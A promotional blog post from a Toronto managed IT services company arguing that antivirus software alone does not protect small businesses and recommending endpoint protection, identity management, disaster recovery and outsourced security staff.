Is Antivirus Enough To Protect Small Business Data?
by TUCU Managed IT Services in Toronto
Commercial antivirus software were wildly popular a few years ago and many companies still swear by them to protect their online IT infrastructure and computer networks. However, do their claims to protect computers from malicious attacks still hold up to modern IT security standards? The answer is a clear no. Antivirus alone is not enough to protect business data.
So the more important question is, by what margin do current antivirus software lack behind modern computer security standards, and what can a small business do to protect themselves from growing cyberattacks. Let’s find out.
How most modern antivirus work (and when they don’t)
Almost all major antivirus software today run on the same principle - they use a database of known malicious files (or viruses) and compare them with the files on a computer. If it ever finds a match, the file is quarantined before the attack can be carried out. This is the core principle behind most antivirus but certain software have their own USPs that make them better than others.
For instance, many new antiviruses come with features like “real-time security” and “real-time scanning” that enable the software to instantly detect malicious files whenever they are accessed, without having to wait for a scheduled or manually triggered system scan. Although this is a significant improvement over traditional antivirus, there are still some glaring issues.
The vast majority of attacks are fileless
Fileless attacks are malware attacks that do not use regular files that can be detected by traditional commercial antivirus software.
These attacks are becoming extremely prevalent and making antivirus software less effective.
In fact, in 2017 77% of successful malware attacks were fileless.
They have since been growing very quickly with 2020 seeing 888% more fileless malware than in 2019.
77% of threats are fileless.
Antivirus can't defend against them.
An antivirus may slow down the computer if RAM is lacking
Although antivirus software have improved significantly in utilizing computer resources, they can still sometimes use too much. For instance, on an idle Windows 10 machine, its own Windows Defender real-time security is responsible for a sizable chunk of RAM which many small business workplaces don’t have enough to spare. Full-system scans are even taxing on the hardware and in extreme cases, make the computer unusable while the scan is in progress.
Many small business owners ignore the advice of their IT consultant when purchasing computers, and go for cheaper specifications without realizing the impact cheaper computers have on performance. When you average the cost difference over the life span of the device, choosing better components makes sense to avoid the immediate gratification of a lower price point. As the saying goes, you get what you pay for.
Antivirus relies on regular updates
Since antivirus software work by matching system files against a database of identified malware, they are only as good as the database. And with more than 360,000 pieces of malware detected every day in 2020 (on average), maintaining an up to database isn’t easy. The antivirus developer may be excellent, but something as simple as ignoring the latest antivirus update, or temporarily suspending your subscription due to a missed payment, could be enough for your computer system to be infected with a potential virus.
How most modern antivirus work (and when they don’t)
In addition to fileless malware and attacks designed to get across specific firewalls, small-medium businesses face a myriad of threats. And antivirus software simply cannot protect companies from many of these threats.
Unfortunately, more than half of all (54%) email malware attacks target small and medium businesses. And since the majority of such attacks contain malicious links used for phishing attacks rather than downloadable files, they cannot be detected by most antivirus software.
One of the most common forms of cyberattacks targeting SMBs is ransomware which results in data encryption almost 75% of the time. Once again, antivirus software are of no use in ransomware attacks as traditional antivirus software have no data recovery capabilities.
Insider Threats and Access Control
A surprisingly high number of cyberattacks stem from insider threats, or from the employees of the company. Lax access control and identity management can mean that employees that shouldn’t have access to critical business information, do. There does not even have to be malicious intent, simple carelessness can cause critical information to leak out, with no help from the antivirus software.
Security alternatives to consider to antivirus for SMBs
Antivirus software is a necessary piece of software that can protect consumer devices such as personal computers and even smartphones. However, when the stakes are higher and you need to protect a network of computer devices or the IT infrastructure of your business, an antivirus alone isn’t enough - you need a more comprehensive security solution that provides wider coverage to the numerous tech threats faced by SMBs today.
One of the most popular of such solutions is endpoint protection. While antivirus software focuses on protecting individual devices from malicious files, endpoint security products focus on protecting the entire IT network and the data that circulates between it (ensuring that data does not go where it isn’t supposed to).
And unlike antivirus software, endpoint protection is a single piece of software that does not need to be managed on individual devices separately. With a central installation, either on the cloud or on-premise, the endpoint protection software allows an IT team to remotely manage firewalls, data loss policies, and access control on every connected device.
Identity Management (IAM) and Granular Access Control
Endpoint protection is often paired with powerful identity management (IAM) tool although both serve different purposes. Endpoint protection is geared more towards device management and ensuring none of the devices connected to the IT network can act as a potential threat. On the other hand, identity management (IAM) tools grant business owners granular access control options for every person that interacts with the IT network in any capacity. Ensuring that no employee has any more access privileges than they absolutely need to.
Security platforms or security suites that offer endpoint protection will often also have some level of identity management (IAM) capabilities as well. So in most cases, you don’t have to look elsewhere.
Unfortunately, cyberattacks are becoming increasingly difficult to avoid and 68% of Canadian businesses anticipate getting hit by a ransomware attack in the future. And one area where antivirus software is miserably underequipped is mitigating damage after a cyberattack has already happened. This is where Disaster Recovery (DR) software can help tremendously.
Disaster Recovery (DR) involves comprehensive plans backed up by the right tools to get services and data back online after a critical failure, such as a major Denial of Service (DoS) attack. Disaster recovery software gives businesses more flexibility than simply creating a backup of their data as it enables them to:
- control the speed of the recovery to match their SLAs
- keep services online despite an attack (albeit at limited scale and performance)
- continue disaster recovery without disrupting consumer experience, and more.
IT Security Team
One of the biggest appeals of antivirus software is its fire-and-forget nature. Outside of regular (automatic) updates, antivirus software requires no maintenance. Unfortunately, this is simply not enough to prevent cyberattacks or more importantly, deal with the aftermath. Companies require a competent IT security staff to help employees work in a secure environment.
Additionally, an IT security team can provide the necessary training and best practices to employees to protect themselves (and the company). For instance, what kind of passwords to keep, how to manage their company devices, how to detect phishing emails, etc.
Thankfully, there are numerous options for technical requirements available today which means companies aren’t limited to hiring a full-time team for their security teams. Staff augmentation, managed services agencies, and outsourcing will all help achieve similar results as an in-house team.
Conclusion: Antivirus helps, but it’s not a standalone solution
Antivirus software does serve a vital purpose - it is a layer of defence against potential cyber threats. What we want to ensure is that it is not the sole layer of defence. As we’ve discussed, there are massive gaps in even modern antivirus software that leave businesses prone to attacks. A layered defence strategy will ensure that when (not if) the antivirus software fails, a different security mechanism can stop the attack from doing any lasting damage.
So the question is, what do you need in addition to antivirus to protect your SMB? Do you need all of the mechanisms discussed above or just one? Ideally, you’d want everything to protect your business but that may not be possible given the cost, time, and manpower constraints that many SMBs have.
So we recommend working with a cybersecurity expert to conduct an audit and find out where your business is most at risk. With remote working becoming more prevalent, most businesses could seriously benefit from a dedicated endpoint protection platform to manage their endpoints (mobiles, tablets, and computers). It’s also highly recommended that you have an IT staff specifically for security. As we discussed, managed IT services agencies and outsourcing are popular and effective alternatives to a full-time in-house team.
For more help with your IT security and a personalized IT security consultation, call TUCU (tech u can use). We are SMB IT Experts serving Toronto since 2003. We offer complete IT management services, including server management, network management and cloud management. We will help you protect everything you have built.